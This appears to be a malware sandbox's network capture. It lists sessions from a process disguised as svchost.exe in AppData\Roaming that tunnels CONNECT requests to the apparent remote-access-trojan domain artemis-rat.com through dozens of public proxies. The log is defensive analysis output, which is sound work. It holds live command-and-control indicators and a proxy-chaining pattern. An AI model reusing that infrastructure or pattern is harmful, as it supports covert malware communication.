                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2844192.168.2.559225202.83.102.83808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.057997942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2845192.168.2.559201202.162.219.10108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.063312054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2846192.168.2.559203202.150.1.878043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.063502073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2847192.168.2.558506162.214.165.64262443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.070699930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.126291990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.177695036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2848192.168.2.55927594.23.220.1363580543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.121129036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.815697908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.787703991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.678015947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2849192.168.2.558478184.185.2.12414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.121325016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2850192.168.2.558688162.159.241.1608043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.121659994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.282847881 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2851192.168.2.558620146.190.51.181312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.132778883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.833554983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2852192.168.2.5592728.222.164.2051567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.133570910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2853192.168.2.559269148.72.206.841481543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.148145914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2854192.168.2.559281130.162.213.175808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.148155928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.460995913 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2855192.168.2.55929720.111.54.168043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.153006077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.450987101 CET319INHTTP/1.1 403 Forbidden
                                                                                    Server: squid
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 17
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    X-Cache: MISS from cdn-fintech.info
                                                                                    X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                    Data Ascii: ERR_ACCESS_DENIED


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2856192.168.2.559398185.162.230.1788043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.162043095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.316379070 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2857192.168.2.559295218.252.244.1268043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.162775040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2858192.168.2.559406104.17.9.1148043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.179353952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.334846020 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2859192.168.2.559411173.245.49.278043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.179528952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.335011959 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2860192.168.2.558421110.93.227.28312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.179529905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.893162012 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2861192.168.2.559285113.140.74.26800043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.180010080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.518033028 CET922INHTTP/1.1 400
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Language: zh-CN
                                                                                    Content-Length: 764
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 e7 8a b6 e6 80 81 20 34 30 30 20 2d 20 e9 94 99 e8 af af e7 9a 84 e8 af b7 e6 b1 82 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 e7 8a b6 e6 80 81 20 34 30 30 20 2d 20 e9 94 99 e8 af af e7 9a 84 e8 af b7 e6 b1 82 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e e7 b1 bb e5 9e 8b 3c 2f 62 3e 20 e7 8a b6 e6 80 81 e6 8a a5 e5 91 8a 3c 2f 70 3e 3c 70 3e 3c 62 3e e6 b6 88 e6 81 af 3c 2f 62 3e 20 49 6e 76 61 6c 69 64 20 55 52 49 3c 2f 70 3e 3c 70 3e 3c 62 3e e6 8f 8f e8 bf b0 3c 2f 62 3e 20 e7 94 b1 e4 ba 8e e8 a2 ab e8 ae a4 e4 b8 ba e6 98 af e5 ae a2 e6 88 b7 e7 ab af e5 af b9 e9 94 99 e8 af af ef bc 88 e4 be 8b e5 a6 82 ef bc 9a e7 95 b8 e5 bd a2 e7 9a 84 e8 af b7 e6 b1 82 e8 af ad e6 b3 95 e3 80 81 e6 97 a0 e6 95 88 e7 9a 84 e8 af b7 e6 b1 82 e4 bf a1 e6 81 af e5 b8 a7 e6 88 96 e8 80 85 e8 99 9a e6 8b 9f e7 9a 84 e8 af b7 e6 b1 82 e8 b7 af e7 94 b1 ef bc 89 ef bc 8c e6 9c 8d e5 8a a1 e5 99 a8 e6 97 a0 e6 b3 95 e6 88 96 e4 b8 8d e4 bc 9a e5 a4 84 e7 90 86 e5 bd 93 e5 89 8d e8 af b7 e6 b1 82 e3 80 82 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 37 35 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <!doctype html><html lang="zh"><head><title>HTTP 400 - </title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP 400 - </h1><hr class="line" /><p><b></b> </p><p><b></b> Invalid URI</p><p><b></b> </p><hr class="line" /><h3>Apache Tomcat/8.5.75</h3></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2862192.168.2.559232116.199.168.1414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.180479050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2863192.168.2.559307122.51.123.2198043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.180536985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2864192.168.2.559329140.238.25.2552100043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.180695057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2865192.168.2.55930891.202.230.219808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.195828915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2866192.168.2.559286123.30.154.171777743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.195843935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.558389902 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.10.3 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2867192.168.2.558516103.13.120.116312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.195933104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.942605019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2868192.168.2.55652924.249.199.12414543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.206110001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2869192.168.2.55931974.48.7.438043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.207501888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2870192.168.2.55929827.65.240.157108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.209341049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
